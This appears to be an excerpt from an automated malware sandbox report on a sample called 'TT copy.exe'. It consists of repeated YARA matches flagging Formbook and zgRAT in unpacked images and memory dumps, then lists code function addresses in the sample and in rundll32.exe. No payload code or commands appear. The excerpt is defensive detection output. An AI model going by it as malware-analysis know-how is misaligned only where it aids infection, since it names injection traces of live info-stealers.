            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.7160000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.7160000.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.3ae0848.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.3ae0848.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: TT copy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.7160000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.7160000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.3ae0848.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.3ae0848.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5E9680_2_00E5E968
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5E9780_2_00E5E978
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5BF9C0_2_00E5BF9C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB2C880_2_06EB2C88
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB89980_2_06EB8998
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB85700_2_06EB8570
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB1F280_2_06EB1F28
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB1F180_2_06EB1F18
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB2C850_2_06EB2C85
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB2C780_2_06EB2C78
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB9B380_2_06EB9B38
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE7F700_2_06EE7F70
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE6D380_2_06EE6D38
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE78D00_2_06EE78D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE00400_2_06EE0040
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE001F0_2_06EE001F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041F0693_2_0041F069
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_004010283_2_00401028
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_004010303_2_00401030
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D9B83_2_0041D9B8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0040928B3_2_0040928B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_004092903_2_00409290
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0040DC303_2_0040DC30
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00402D873_2_00402D87
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00402D903_2_00402D90
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041EDBB3_2_0041EDBB
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041E7903_2_0041E790
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00402FB03_2_00402FB0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106F9003_2_0106F900
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010841203_2_01084120
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010899BF3_2_010899BF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011210023_2_01121002
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113E8243_2_0113E824
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A8303_2_0108A830
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107B0903_2_0107B090
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010920A03_2_010920A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011320A83_2_011320A8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011328EC3_2_011328EC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A3093_2_0108A309
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01132B283_2_01132B28
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AB403_2_0108AB40
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0110CB4F3_2_0110CB4F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109EBB03_2_0109EBB0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112DBD23_2_0112DBD2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011203DA3_2_011203DA
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109ABD83_2_0109ABD8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011123E33_2_011123E3
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111FA2B3_2_0111FA2B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011322AE3_2_011322AE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01132D073_2_01132D07
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01060D203_2_01060D20
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01131D553_2_01131D55
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010925813_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D823_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011325DD3_2_011325DD
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107D5E03_2_0107D5E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107841F3_2_0107841F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112D4663_2_0112D466
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B4773_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011244963_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113DFCE3_2_0113DFCE
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01131FF13_2_01131FF1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112D6163_2_0112D616
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01086E303_2_01086E30
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01132EF73_2_01132EF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05272D0715_2_05272D07
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A0D2015_2_051A0D20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05271D5515_2_05271D55
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D258115_2_051D2581
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052725DD15_2_052725DD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051BD5E015_2_051BD5E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B841F15_2_051B841F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526D46615_2_0526D466
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526449615_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05271FF115_2_05271FF1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0527DFCE15_2_0527DFCE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051C6E3015_2_051C6E30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526D61615_2_0526D616
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05272EF715_2_05272EF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051AF90015_2_051AF900
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051C412015_2_051C4120
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051C99BF15_2_051C99BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0527E82415_2_0527E824
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526100215_2_05261002
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CA83015_2_051CA830
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051BB09015_2_051BB090
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052720A815_2_052720A8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D20A015_2_051D20A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052728EC15_2_052728EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05272B2815_2_05272B28
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CA30915_2_051CA309
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CAB4015_2_051CAB40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DEBB015_2_051DEBB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DABD815_2_051DABD8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052523E315_2_052523E3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526DBD215_2_0526DBD2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052603DA15_2_052603DA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0525FA2B15_2_0525FA2B
